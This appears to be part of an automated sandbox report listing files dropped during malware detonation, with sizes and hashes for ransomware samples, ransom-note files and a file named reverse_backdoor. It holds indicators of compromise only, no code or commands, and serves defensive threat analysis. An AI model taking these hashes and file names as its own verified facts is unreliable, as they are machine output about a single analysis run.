                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  4acc22256630721e204e7fe2bbb7f581

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  4cbc3046508d1b0fee3524f5dda48917155e3d7b

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  6aa3d86aa25e4c9054bc536dcd32bb5e79bfbc58950ad1198192d5cfc9b5b499

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  b6b3abdc09adf90ccf202ee83d206e1e8ddd0e205caefd5eb2f0f5151042dc1097ca69470b93c2763cfbaa4c7bc86a3db53e45a129c2b8ae2dd38bd6b6603300

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  b30d3becc8731792523d599d949e63f5

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  19350257e42d7aee17fb3bf139a9d3adb330fad4

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  56KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  752a1f26b18748311b691c7d8fc20633

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  fed441e1393f857170215fe17cdd32ce

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  6f36e5fd651625bc20ca50789331a49b11b3b0c1

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  5582ea9f9cd1e0b12127da9d05985d535b5f7d175b6cbf289bc45ae2f1abd176

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  4d75a71fd393e87d6787fcb1490da7c972930aaa1830c04c18b4cfda54457880c7f3e18a693cfc4294674e8efc4cab2a9f4ac7b9bd7b9775aa9f5febfce285b9

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  12KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  7d932c1bfee9bea2fe55ce179b640f2e

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  f50dd362094061998bbd2829db901be968abd546

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  81d9db75cfafa9f69c63f8627335aea841d4d2c8ffdc1ea1dcba2521fe220642

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  7e022c3fdfdcb798479cbed6c54be95f790a33fb84962613a8fc5fe7036339f883cdef0fb817883edec0d12802314a20a03a4949aa60a91406e0cff4b351e309

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4B

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  f49655f856acb8884cc0ace29216f511

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  944B

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  6bd369f7c74a28194c991ed1404da30f

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Office\_R_E_A_D___T_H_I_S___JQ6X30OI_.txt

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  55e4d8ff2faa23b9893283c231f087cc

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  420bdb0f1eeeb6ef0b46a369452843e2c6cc9a95

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  e032b3ac9dff6ad129b2a11f42feaf1844a987d822361ae3541027ccb48cc33d

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  0a33781317053c7e7992bfc8f2f6f2620d5b1191d28919cdba61459734d4f85a9b16d2dbc5129a6391fed17526d7bdc92663931d2d5823fa4d363462e1587ebb

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Office\_R_E_A_D___T_H_I_S___ZX0XEV_.hta

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  75KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  a3e88555a8c978b92fb1d20aba6c4cf1

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  f21c4699613f002a9354c692290438e4a5952947

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  481d2ec9530e17f530f053c5f62e0192470071836a9661337825918c72cd01d8

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  8d743a01ca0111291c79658f071b93f20669b59ef8b48481c8d8664b80685c7a12649300612de840591175024d648015c02ef228f8f998385d26bf2fba65a87d

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI29362\_ssl.pyd

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  ad04905c729c25cd5737e2fd251199c8

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  0dd290f48d92f72735349d93e3afa8d7eed642ed

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  713d3f421c4125485562e64fc2e0494b8feaa40b9e7408f0aa1413d3c7c17da6

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  1cf64250dbdaf8fc54b6b5b61d389a1f0a288b87702608347f7626e8ba5c528deaaa51c4b8b572dd44af2da82577b16ccf917cf1a466de6b395f1d6b78340697

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI29362\bz2.pyd

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  90KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  1baab9715025cf6f5dbbf904e1dd307e

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  5fbfcc78ec81a27adc926becab8a63d4fd8543a9

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  c4da7fe8fb8d3b8f2c03b9273431fab3ebbed12ced442767e000a1034f378125

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  ac1fc5613338827c865de8c649bf45c3fed896da7e6670e014032f3ef60061e865d030cc09cfee033c38dde5e7f0b271f793041a4802832b55e7c87cf99707c8

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI29362\python27.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  3.3MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  73404d7ba425931ac4e01bf368ad0f29

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  2e56454080d7b61bab26c788b2f0d878a15a849d

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  c49cec63a8e8707bac8c360dbd6ee76dd97743a3474217fc9d97cf173e82bd31

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  bd09d2013444fa42e4a270c44c17aa10eb144c320c5133a66f25fb50ca72c137e276c89fd0002db37b01e9ad47b7b7b104cb755cdb66d17813a8471851d9e313

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI29362\reverse_backdoor.exe.manifest

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  09f1f92d09837b363bd4016a224ed20f

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  7cbc3a95fd032e504d53adf1fe87a6b5dac73685

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  d0821c48ebe5f17f6be998c3ecc3d5049942d414545d079f87b54fdb0469f4c0

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  511f27f5fb11c889e85163b17502f29c13a36869ab851f892a913e818daf1a14a48f5b77117e9c5d5ad1af2448b12b6d627124ec7a0b2ff4d89fabb56a83d10f

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI29~1\_socket.pyd

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  49KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  98c84771b43613b5f2e7f402488cabd2

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  da4e1cd46b43d192f5fa2ceff02291c833863055

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  e7aadad889cd73e8b83315e4c26ce6bfefe3695e0cef43e73be4141d7de9a6eb

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  96ce6085075414ffae7403fbb930c46f959e5980dfc66c96879f0dc138f9cdfa3911972974416fcc4899e67c2e4b5a10b29afd2816c6a877af4131335318cbbb

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI29~1\sample.pdf

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  e8aa55f8d57f97330a54d84e65722996

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  25ffe233c7a4bf638d73d86ea160f66a4123f5a8

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  0e2c3267cfa7157936d4d2f29b90d070d2e1e602439fee68134add954afdc178

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  8a67db6b2b11f29c8b3fb5a633dbf326c00d1efd87e07df83140c16f64d3fc5376234026b0c92cb3c663717d14cb91070a4cd65f4bbef61cacd97858ea62806e

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fssfc3yt.er3.ps1

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  60B

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vodoi.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  535KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  7df7f7c6625188b897bcf01e3d15e170

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  ca2626ae064a52e6f7776834082c8f6e20661915

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  a12aa4836352b2f57404a076728944bc0073aab83bef22b7a7bd8fc3aebc8681

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  70a8a0c27f04eb00c04f94d3da909a398f5ea7cabb82795441ff627c388e638537a6ff2e83338d68778f97595d2132475b8efe6e242288e2fee7850ce31ca2c4

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\yptew.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  241KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  54f4098e8e9c29b36219ab8e636df7b9

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  67dd7aef4d2fc2b53850d200b71f3be478c058fe

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  d57286153fc11685d4730334a099383e4bac39c0a87c0e9e07737047129108db

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  224c3b0bc4a71e6f17723d652f4894e6c08c69a16c4f9b8fd9467a773e24fdc0d596c5f76463c5a863089bc8c20760b79bb6e85b281e8cb17ed4a254889444ab

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  52KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  58cd7f28b1dbabd3aac3101f7b8bda70

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  7df14918dcb1547b66bdbb883918381e017f34d0

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  8873a929826530335432a21cf2564b49c7cfd7ae81c91b0905687f199b5ae51d

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  73a95d155617ffe085b5040e241a4ad92b6ede7656fea384b97c74b249094bb68bc585b1aab27ac9552b39f5c4ea4ff6789a63a5dca519c411ee8fe8383d8a1f

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  448B

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  5ad69949a799cab11a9e353d3d68ff71

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  e20d3d56d9dc9287ae3a0717086a3e98c8b4a898

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  6efa7b8d98ea4551a716da74036f2ab51472d7029bd11ffb9d56aef5184bdbe8

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  2d78ef0237b7bde9ad7bb705e9dc69ef70b5b7cde567957ba1d6bed910eb2660a8fd18019173973e76adce126dbc78a2100ac81d004ed53c406ac9d5a7240b80

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  a2f259ceb892d3b0d1d121997c8927e3

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  6e0a7239822b8d365d690a314f231286355f6cc6

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  ab01a333f38605cbcebd80e0a84ffae2803a9b4f6bebb1e9f773e949a87cb420

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  5ae1b60390c94c9e79d3b500a55b775d82556e599963d533170b9f35ad5cfa2df1b7d24de1890acf8e1e2c356830396091d46632dbc6ee43a7d042d4facb5dad

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Contacts\WzEgyMggM.README.txt

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  c0e29ee3096999d3c134f7ac387ca91d

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  69c5c97862f7edb04094f369f7b19dde971e3b3e

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  7962087868b2d24ca98407610b25fa00ddeb0026cd723f231a57cc8a5198e3c6

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  1aed2257592f76032a7673b61eb91ba99f01c30f36c408fbe5014edae89145aa9858d8dcb380b4c9e446f5c3c24c4bb15b4f8ebc8d1df6850f72f847a40e4535

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5ea07c8da7781767b8085b2a8a43dd20187738d10017cbbf199d42caf2172d4f.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1.9MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  e0b001422e9c8a661b7c06e7c8a5f243

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  522881500635d9c4147d876a002669441b00b41c

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  5ea07c8da7781767b8085b2a8a43dd20187738d10017cbbf199d42caf2172d4f

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  cc67fe5d5a09b7564adc3c984d128c8d680637b446b6e2ad9786ee54de89f25173797439068bb5412ef98e1324d235e789c8c6577d724d293b05f1f201b56108

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Agent.gen-93db1fb7ce3920e2b518b5df59abf0283e4630e5446e6af9883fae0e17e28f99.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  56KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  a669b9c0080a4695ffed532bbc8ec64d

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  2a49b2b1bd785f951ca912a500438b997c9cfb74

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  93db1fb7ce3920e2b518b5df59abf0283e4630e5446e6af9883fae0e17e28f99

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  1ea933cb5d5444474959afe77308782891faa12eb49815f77f9d8aecc9433a7e44edc1cfc93535c79c79c8418bc5dd31cc5cb8c59e8013142acf630ee2356af5

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Bitman.vho-24c72c89dead0d71ad751d1cb5a6fe956586952ec555ebeeb6e6d0901763c154.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  49ae0611e4304876dd7908fd163bafcb

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  5f4939635a072656d8175bd717ba06a8a5bfb6df

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  24c72c89dead0d71ad751d1cb5a6fe956586952ec555ebeeb6e6d0901763c154

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  0660592d50ebeee71c334f683c37ac7823a47f1ada4dd5938c9e3697ff1a7747e3926f5a0005983d297fb8877eb16cc131d7c3d56193e18f1513c8eae87a7f5c

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Bitman.vho-a71eb17223e9300a1b37f9da5cadc29cbe5b551e661d431eb3fd040eafbc4945.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4.4MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  8331b7454902d89d8184a2c2cc431e0c

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  168be80d8a4843835cdb193cd34a61d07449e59f

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  a71eb17223e9300a1b37f9da5cadc29cbe5b551e661d431eb3fd040eafbc4945

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  cd3c3b9b5ec7f37a2dd98cc1549694f5a56de8b564fffc5dd66909b47c1c1182fdcd9747165fc714ac16053a6da41be008a05e7fd211866c3427567a90745015

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Blocker.pef-f02cbcc174a9c4bd426fad2cd0e6cb9587e5fa90262d6ff09fe7c672b5653d9d.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  52KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  20dd18acd8b2e087e6516c913aaa7244

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  a54278ac17064a49c7a8a2de4ab70b8e85b2a4fe

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  f02cbcc174a9c4bd426fad2cd0e6cb9587e5fa90262d6ff09fe7c672b5653d9d

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  584de20dd9f78fc3cf13da91567589e245042fa471cb64bc408b7f1ed5e73e68bb4bc588ca4a2e1f7d5f43966caa12b6950cde82d31c8e7f83886b8ab029ff01

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Blocker.vho-cd47301ad14fefb0d6ac75f8ac1dcf2b0d854527d0f0df495e6d85ef9fc83b9c.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4.1MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  668fdb11f9fe36aff8013de5583a9c07

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  1f050b24b60830f7a57289c25a08d4c04796d499

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  cd47301ad14fefb0d6ac75f8ac1dcf2b0d854527d0f0df495e6d85ef9fc83b9c

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  7c2f49d2b2875e09e62738d13e8f281b63c4d874a32fc658db4bd1c05ebac7ab431c028df9800fce6340e6ab46f4ab8bbb732884a5e2ac7d73ef3b271cfaee99

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.CryptXXX.pef-b7ce576cffde2cc76d9ce43a46f928441a803bc9308f017960aa75d804e446b6.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  326KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  aa6311eeab174d174252c86532169486

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  e7b1bfbf03e87373a40b61be2ddedeb1ee33c08a

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  b7ce576cffde2cc76d9ce43a46f928441a803bc9308f017960aa75d804e446b6

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  e44499b67be119f4a8d16d3c78be2f2260e498e90f182934350c8640c1f1de8bfcd9cb66384543702d01d8d3570d80af2e508c4d30e9807fbbb2800c2efbd506

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f52116fc94b8f17dff33a229352b3d2a9d8172295be3cde8370071d895186f88.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  130KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  ba678984e3cf4a7a1421bc278cfe12f0

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  831f3dfaa1ee56b265166fe2af3c03823930d4d0

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  f52116fc94b8f17dff33a229352b3d2a9d8172295be3cde8370071d895186f88

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  b4c07b1e8d99f1287098a7528ebac060e0cf9ae3a574876f5dcd2cdaa27678ed44b1430055d2b3dc4ea777f9df4df816e1cfe415e4c48564f5f22fd6225b66fe

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\HEUR-Trojan.MSIL.Crypt.gen-cd081096bb014161849ae4607951099bf1e2c63d0b22aa09a8688deecc67b44d.zip

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  455KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  bd003059f51131cfd2f1f8bf4367ab5e

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  d12e30552ee82455fa49cab1553830f8d5d9e245

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  24cef129b0757ec5eaf2e3d925d8efe790d379cd833d0d2f16b4d4ab8fe1ca79

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  8ba96bd84a9ba36c03e19fdbc46abe7c2a6c4890491aa7f35537063962f4626149704753bb1ceda68ffa02549b26318a5d56dd01bffaf696e1f97817c8a2d457

                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Blocker.ncjs-6c1e5af76e68a98efa15b17dd7103f77a3e8bf17b0835d3e04f664b0b0ae1d46.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  9f1a0ae2059beb643a8de2f392fef7e2

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  c7dbbd07a07ef108c5a72e7986630a27788f9c53

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  1d99535b2c920d37d84aaeb30fa9d03af5ef6d483fb1c5ec3f192cc2eb79920b

